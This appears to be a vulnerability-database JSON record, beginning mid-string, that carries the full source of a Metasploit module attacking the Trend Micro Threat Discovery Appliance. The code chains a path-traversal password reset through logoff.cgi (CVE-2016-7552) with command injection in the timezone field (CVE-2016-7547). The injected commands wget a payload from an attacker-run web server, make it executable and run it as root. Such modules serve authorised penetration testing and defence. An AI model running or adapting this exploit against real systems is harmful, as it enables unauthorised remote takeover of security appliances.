normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'),\n 'method' => 'POST',\n 'vars_post' => {\n 'passwd' => datastore['PASSWORD'],\n 'isCookieEnable' => 1,\n }\n })\n\n # these are needed due to the reboot\n rescue Rex::ConnectionRefused\n return false\n rescue Rex::ConnectionTimeout\n return false\n end\n if login and login.code == 200 and login.body =~ /frame\\.cgi/\n @cookie = \"session_id=#{$1};\" if login.get_cookies =~ /session_id=(.*);/\n return true\n end\n return false\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T17:16:30", "description": "This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance. The first is an authentication bypass vulnerability via a file delete in logoff.cgi which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552). The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi interface (CVE-2016-7547). Note: You have the option to use the authentication bypass or not since it requires that the server is rebooted. The password reset will render the authentication useless. Typically, if an administrator cant login, they will bounce the box. Therefore, this module performs a heartbeat request until the box is bounced and then attempts to login and to perform the command injection. This module has been tested on version 2.6.1062r1 of the appliance.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-10T18:32:58", "type": "metasploit", "title": "Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7547", "CVE-2016-7552"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/TRENDMICRO_THREAT_DISCOVERY_ADMIN_SYS_TIME_CMDI/", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution',\n 'Description' => %q{\n This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance.\n The first is an authentication bypass vulnerability via a file delete in logoff.cgi\n which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552).\n The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi\n interface (CVE-2016-7547).\n\n Note: You have the option to use the authentication bypass or not since it requires\n that the server is rebooted. The password reset will render the authentication useless.\n Typically, if an administrator cant login, they will bounce the box. Therefore, this\n module performs a heartbeat request until the box is bounced and then attempts to login\n and to perform the command injection. This module has been tested on version 2.6.1062r1\n of the appliance.\n },\n 'Author' =>\n [\n 'mr_me <steventhomasseeley@gmail.com>', # vuln + msf\n 'Roberto Suggi Liverani @malerisch', # vuln + msf\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://asciinema.org/a/112480'], # demo\n [ 'CVE', '2016-7552'], # auth bypass\n [ 'CVE', '2016-7547'], # cmdi\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Privileged' => true,\n 'Payload' =>\n {\n 'DisableNops' => true,\n },\n 'Targets' =>\n [\n [ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ]\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2017-04-10'))\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'The target URI', '/']),\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']),\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),\n OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]),\n\n ])\n end\n\n def check\n if do_login\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'),\n 'cookie' => @cookie,\n 'method' => 'GET',\n }, 1)\n if res and res.code == 200 and res.body =~ /About Trend Micro/\n version = \"#{$1}\" if res.body =~ /var ver_str = new String\\(\"(.*)\"\\)/\n case version\n when /2.6.1062/\n return Exploit::CheckCode::Vulnerable\n end\n end\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n if datastore['AUTHBYPASS']\n print_status(\"Bypassing authentication...\")\n if reset_password\n print_good(\"The password has been reset!\")\n print_status(\"Waiting for the administrator to reboot...\")\n pwn_after_reboot\n end\n else\n if do_login\n pwn\n else\n fail_with(Failure::NoAccess, \"Authentication failed\")\n end\n end\n end\n\n def reset_password\n c = \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'),\n 'method' => 'GET',\n 'cookie' => c,\n })\n\n if res and res.code == 200 and res.headers.to_s =~ /Backtrace/\n return true\n end\n return false\n end\n\n def pwn\n start_http_server\n print_good(\"Logged in\")\n download_exec\n end\n\n def pwn_after_reboot\n @rebooted = false\n while !@rebooted\n if do_login\n @rebooted = true\n pwn\n end\n end\n end\n\n def on_request_uri(cli, request)\n if (not @pl)\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\n return\n end\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\n @elf_sent = true\n send_response(cli, @pl)\n end\n\n def start_http_server\n @pl = generate_payload_exe\n @elf_sent = false\n\n downfile = rand_text_alpha(8+rand(8))\n resource_uri = '/' + downfile\n\n # do not use SSL for the attacking web server\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\n srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)\n else\n srv_host = datastore['SRVHOST']\n end\n\n @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\n service_url_payload = srv_host + resource_uri\n\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\n start_service({'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => resource_uri\n }})\n\n datastore['SSL'] = true if ssl_restore\n connect\n end\n\n def exec(cmd)\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'),\n 'cookie' => @cookie,\n 'method' => 'POST',\n 'vars_post' => {\n 'act' => 'save',\n 'timezone' => cmd,\n }\n }, 1)\n end\n\n def download_exec\n @bd = rand_text_alpha(8+rand(8))\n register_file_for_cleanup(\"/tmp/#{@bd}\")\n exec(\"|`wget #{@service_url} -O /tmp/#{@bd}`\")\n exec(\"|`chmod 755 /tmp/#{@bd}`\")\n exec(\"|`/tmp/#{@bd}`\")\n\n # we need to delay, for the stager\n select(nil, nil, nil, 5)\n end\n\n def do_login\n\n begin\n login = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'),\n 'method' => 'POST',\n 'vars_post' => {\n 'passwd' => datastore['PASSWORD'],\n 'isCookieEnable' => 1,\n }\n })\n\n # these are needed due to the reboot\n rescue Rex::ConnectionRefused\n return false\n rescue Rex::ConnectionTimeout\n return false\n end\n if login and login.code == 200 and login.body =~ /frame\\.cgi/\n @cookie = \"session_id=#{$1};\" if login.get_cookies =~ /session_id=(.*);/\n return true\n end\n return false\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
